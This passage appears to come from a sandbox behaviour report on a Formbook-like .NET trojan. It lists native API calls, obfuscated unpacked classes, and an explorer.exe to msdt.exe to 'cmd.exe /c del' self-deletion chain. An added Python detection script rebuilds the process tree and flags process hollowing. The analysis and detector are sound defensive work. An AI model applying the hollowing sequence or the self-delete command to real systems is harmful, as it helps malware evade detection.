          Source: C:\Windows\explorer.exe | Code function: 3_2_0889A5CD
          Source: C:\Windows\explorer.exe | Code function: 3_2_0888ED02
          Source: C:\Windows\explorer.exe | Code function: 3_2_08894912
          Source: C:\Windows\explorer.exe | Code function: 3_2_08891B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_08891B32
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E709232
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E703B30
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E703B32
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E708036
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E6FF082
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E706912
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E700D02
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E70C5CD
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: String function: 0179B910 appears 46 times
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A350 NtCreateFile
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A400 NtReadFile
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A480 NtClose
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A530 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A3FB NtReadFile
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041A3A2 NtReadFile
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2B20 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2BB0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2A90 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2DB0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2D90 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2C60 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2C30 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2CF0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2CD0 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2F70 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2F50 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2FA0 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2E60 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2E40 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E2EF0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E3050 NtSetValueKey
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E4320 NtSetContextThread
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_017E3590 NtCreateMutant
          Source: C:\Windows\explorer.exe | Code function: 3_2_08898E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 3_2_08897232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 3_2_08898E0A NtProtectVirtualMemory
          Source: 2FcJgghyXg.exe, 00000001.00000002.1252377746.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEvor.dll0 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1258937679.00000000053C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameEvor.dll0 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1251054886.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1260071587.0000000008480000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000002.1253892439.000000000401F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000001.00000000.1232031634.00000000006F6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamexYQq.exeB vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.000000000189D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.00000000033A5000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemsdt.exej% vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe | Binary or memory string: OriginalFilenamexYQq.exeB vs 2FcJgghyXg.exe
          Source: 2FcJgghyXg.exe | ReversingLabs: Detection: 39%
          Source: 2FcJgghyXg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Process created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Process created: C:\Users\user\Desktop\2FcJgghyXg.exe C:\Users\user\Desktop\2FcJgghyXg.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\2FcJgghyXg.exe"
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2FcJgghyXg.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@173/1@4/6
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.SetAccessControl
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | Security API names: _0020.AddAccessRule
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2FcJgghyXg.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.cs | Cryptographic APIs: 'CreateDecryptor'
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 2FcJgghyXg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 2FcJgghyXg.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 2FcJgghyXg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdbSHA256K source: 2FcJgghyXg.exe
          Source: Binary string: wntdll.pdbUGP source: 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 2FcJgghyXg.exe, 2FcJgghyXg.exe, 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.2500706865.0000000004DBD000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1328099105.0000000004ADF000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000003.1322862387.0000000004924000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: 2FcJgghyXg.exe, 00000002.00000002.1324284737.0000000003350000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.2497776864.00000000007E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: xYQq.pdb source: 2FcJgghyXg.exe
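Two of the row groups above are the ones worth turning into reusable checks. The NtCreateSection / NtMapViewOfSection / NtUnmapViewOfSection / NtSetContextThread / NtResumeThread set resolved for process index 2 sits at 0x017Exxxx, inside the same process-2 dump region (1322759812, base 0x01770000) that carries the wntdll.pdb path and the ntdll.dll OriginalFilename, i.e. Formbook's own privately loaded copy of ntdll, which is how it reaches the syscall stubs without passing through the loader-mapped, possibly hooked one. The second is the explorer.exe -> msdt.exe -> cmd.exe /c del "<sample>" chain: the copy migrated into explorer.exe picks a system binary, injects into it, and that binary removes the dropper. The block below is an added example, not part of the Joe Sandbox report: it rebuilds the process tree from the "Process created" rows and groups the resolved NtXxx calls by process index to test for the hollowing primitive set. The rows are copied from the report; the Sysmon-style field names (Image, ParentImage, CommandLine), the C:\Users scope and the four-step hollowing signature are this example's own choices.

```python
"""Rebuild the process tree and the per-process native-call sets from the
behaviour rows of a sandbox report. Added example; the rows are copied from
the report above, the field names and signatures are this example's own."""
import re
from collections import defaultdict

# "Process created" rows, recorded Sysmon-style (field names are an assumption).
PROCESS_EVENTS = [
    {"ParentImage": "unknown",
     "Image": "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe",
     "CommandLine": "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe"},
    {"ParentImage": "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe",
     "Image": "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe",
     "CommandLine": "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\SysWOW64\\msdt.exe",
     "CommandLine": "C:\\Windows\\SysWOW64\\msdt.exe"},
    {"ParentImage": "C:\\Windows\\SysWOW64\\msdt.exe",
     "Image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "CommandLine": '/c del "C:\\Users\\user\\Desktop\\2FcJgghyXg.exe"'},
    {"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
     "Image": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
]

# "Code function" rows: <process index>_<phase>_<address> <APIs called inside>
CODE_ROWS = """
2_2_017E2CF0 NtUnmapViewOfSection,LdrInitializeThunk,
2_2_017E2CD0 NtMapViewOfSection,LdrInitializeThunk,
2_2_017E2EF0 NtCreateSection,LdrInitializeThunk,
2_2_017E4320 NtSetContextThread,
2_2_017E2F70 NtResumeThread,LdrInitializeThunk,
2_2_017E2F50 NtProtectVirtualMemory,LdrInitializeThunk,
2_2_0041A530 NtAllocateVirtualMemory,
3_2_08898E12 NtProtectVirtualMemory,
3_2_08897232 NtCreateFile,
"""

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
DEL_RE = re.compile(r'/c\s+del\s+"?(?P<target>[^"]+\.exe)"?', re.IGNORECASE)
ROW_RE = re.compile(r"^(?P<proc>\d+)_\d+_(?P<addr>[0-9A-F]{8})\s+(?P<apis>[\w,]+)",
                    re.MULTILINE)

# Hollowing needs all four steps; each call on its own is common in benign code.
HOLLOWING = {
    "unmap": {"NtUnmapViewOfSection"},
    "write": {"NtMapViewOfSection", "NtWriteVirtualMemory"},
    "context": {"NtSetContextThread"},
    "resume": {"NtResumeThread"},
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_self_delete(events):
    """(parent tool, deleted path) for every cmd.exe /c del <exe> whose parent
    is a Windows system binary and whose target lives under the user profile."""
    hits = []
    for ev in events:
        if basename(ev["Image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(ev["CommandLine"])
        if not m:
            continue
        target = m.group("target")
        if (ev["ParentImage"].lower().startswith(SYSTEM_DIRS)
                and target.lower().startswith("c:\\users\\")):
            hits.append((basename(ev["ParentImage"]), target))
    return hits


def lineage(events, image):
    """Follow ParentImage links upwards from `image`; stops at the root, at an
    unknown parent, or on a cycle (the dropper re-launching itself)."""
    parent_of = {basename(e["Image"]): e["ParentImage"] for e in events}
    chain = [basename(image)]
    while chain[-1] in parent_of and parent_of[chain[-1]] != "unknown":
        nxt = basename(parent_of[chain[-1]])
        if nxt in chain:
            break
        chain.append(nxt)
    return chain


def native_calls_by_process(rows):
    """Map process index -> set of NtXxx names resolved inside that process."""
    calls = defaultdict(set)
    for m in ROW_RE.finditer(rows):
        calls[int(m.group("proc"))].update(
            a for a in m.group("apis").split(",") if a.startswith("Nt"))
    return calls


def hollowing_processes(rows):
    """Process indices whose resolved native calls cover every hollowing step."""
    return [proc for proc, apis in sorted(native_calls_by_process(rows).items())
            if all(apis & step for step in HOLLOWING.values())]


if __name__ == "__main__":
    print("self-delete:", find_self_delete(PROCESS_EVENTS))
    print("lineage of cmd.exe:", " <- ".join(lineage(PROCESS_EVENTS, "cmd.exe")))
    print("hollowing in process index:", hollowing_processes(CODE_ROWS))
```

On real telemetry the self-delete rule should key on the parent being a signed Microsoft binary that has no file-management role (msdt.exe here; Formbook rotates through a list of such tools), not on msdt.exe specifically, and the hollowing signature should be evaluated per process, never across the whole report, because explorer.exe's own NtProtectVirtualMemory would otherwise pad the match.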

          Data Obfuscation

          Source: 2FcJgghyXg.exe, flogin.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | .Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | .Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | .Net Code: QtR7YmfDPZ System.Reflection.Assembly.Load(byte[])
          Source: 1.2.2FcJgghyXg.exe.2b81d34.0.raw.unpack, WFD.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 1_2_0105E9B8 pushfd ; retf 1_2_0105E9B9
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041E914 push ecx; ret 2_2_0041E91C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_004169F3 push es; iretd 2_2_00416A37
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00416A3B push ebp; retf 2_2_00416A3C
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_00416A3E push ebx; retf 2_2_00416A77
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_004164F6 push ds; retf 2_2_004164FC
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe | Code function: 2_2_004176ED push edi; retf 2_2_004176EE
          Source: C:\Windows\explorer.exe | Code function: 3_2_0889A9B5 push esp; retn 0000h 3_2_0889AAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_0889AB02 push esp; retn 0000h 3_2_0889AB03
          Source: C:\Windows\explorer.exe | Code function: 3_2_0889AB1E push esp; retn 0000h 3_2_0889AB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E70CB1E push esp; retn 0000h 3_2_0E70CB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E70CB02 push esp; retn 0000h 3_2_0E70CB03
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E70C9B5 push esp; retn 0000h 3_2_0E70CAE7
          Source: 2FcJgghyXg.exe | Static PE information: 0xA9C135F0 [Thu Apr 1 02:22:40 2060 UTC]
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, srHQXlz7jnNiCOT24M.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, JneaKoxYOwZYUwgJbY.cs | High entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, snN1xF7S4RmgbgcW05.cs | High entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, myKyekVHN8n3nqSuWK.cs | High entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, S6lVZNGDd6KIuoI9tW.cs | High entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, JPpxSbptHsfMShtm7I.cs | High entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, DOTAclT6fwjdsxDxYB.cs | High entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, lVaG3Sl3dvGlBTGm5Q.cs | High entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, OR1PhfbJmeXRkgxLeU.cs | High entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, yoyd7cHYYLaJbiic6L.cs | High entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, FAwW796SXsNRBegtEvs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, Q6n3y0QYd7oU3LmetC.cs | High entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | High entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, aeih4850tCygqgvN25.cs | High entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, G7ZMqUarOIYkDdbkRW.cs | High entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, Iu4ZYc69hOfmwAxsFlO.cs | High entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, qFJdNBqjj4uODIWIhK.cs | High entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, K2wBRMjdm6agx0EcTv.cs | High entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
          Source: 1.2.2FcJgghyXg.exe.416d6d0.3.raw.unpack, nRPRNWBauvUXMaKqsE.cs | High entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, srHQXlz7jnNiCOT24M.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
